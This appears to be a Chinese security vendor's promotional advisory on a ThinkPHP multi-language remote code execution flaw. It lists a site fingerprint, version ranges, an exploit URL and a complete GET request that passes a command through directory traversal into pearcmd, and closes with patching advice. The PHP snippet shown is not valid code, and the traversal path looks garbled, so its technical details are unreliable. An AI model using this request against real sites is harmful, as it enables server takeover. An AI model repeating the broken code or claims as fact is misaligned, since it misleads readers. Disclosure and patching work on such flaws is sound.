【漏洞预警】Thinkphp 2022年远程代码命令执行漏洞V5 V6详情

点击上方蓝字,记得关注我们!
Web·App攻击防护-有效防御黑客入侵

01

漏洞描述

ThinkPHP可以说是快捷、简易的面向对象编程的一个微服务架构,PHP前端框架开发,创建于2006年,遵照Apache2的开源协议进行对外开放,目的是为了快速WEB应用程序开发和优化企业应用软件开发而发展起来的。假如Thinkphp代码开启了多语言这个功能,hack就能通过POST、GET、COOKIES等方式将恶意参数插入进去发送到服务器中进行执行恶意代码,并目录穿越+文件包含,利用pearcmd文件含有这个trick就可以实现RCE远程代码执行漏洞。


02

使用thinkphp并开启多语言的网站漏洞指纹如下:


header="think_lang"


03

漏洞影响版本范围


v6.0.0<=ThinkPHP<=v6.0.13

v5.0.0<=ThinkPHP<=5.0.12

v5.1.0<=ThinkPHP<=5.1.8


04

漏洞详情


漏洞利用详情

exp
Web APP Sine Safe

pearcmd文件含有方法

$cmd=$_GET['cmd'];

$p=pearcmd;

$p->run($cmd);

目录穿越

http://192.168.0.188:9999/index.php?s=index/index/index/think_lang/../../extend/pearcmd/pearcmd/index&cmd=DIR

能通过POST、cookies、GET等传参的方式,进行目录穿越和文件包含漏洞的利用,对thinkphp下的pearcmd文件进行远程代码命令执行,

HACK可以利用构造恶意的的URL,可以实现目录穿越和文件包含,然后利用pearcmd文件含有对其服务器进行远程命令执行。

这个漏洞利用的前提,必须要thinkphp开启多语言这一功能,像一些外贸公司网站,一些企业网站,想使用多语言的网站都是可以利用该漏洞进行远程代码执行漏洞的。


具体的GET漏洞利用数据包如下:


GET/index.php?s=index/index/index/think_lang/../../extend/pearcmd/pearcmd/index&cmd=DIR

Host:192.168.0.188:9999

User-Agent:Mozilla/5.0(WindowsNT10.0;Win32;x32;rv:79.0)Gecko/20100302Firefox/79.0

Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language:zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.6,en-US;q=0.4,en;q=0.1

Accept-Encoding:gzip,deflate

Connection:close

Upgrade-Insecure-Requests:1

Cache-Control:max-age=0


05

如何对该thinkphp漏洞进行修复?


我们SINE安全建议广大站长以及网站运营者,尽快的升级thinkphp到最高版本,目前Thinkphp官方在最新版本中修复了这个漏洞,也可以对该pearcmd文件进行强制删除,待代码漏洞修复后,还原该pearcmd文件。


SINE安全

←扫码联系技术人员

为Web和APP提供攻击安全防护!

术有专攻 安全防护!

好看你就分享 有用就点个赞

支持「网站安全」就点个三连吧!

查看原文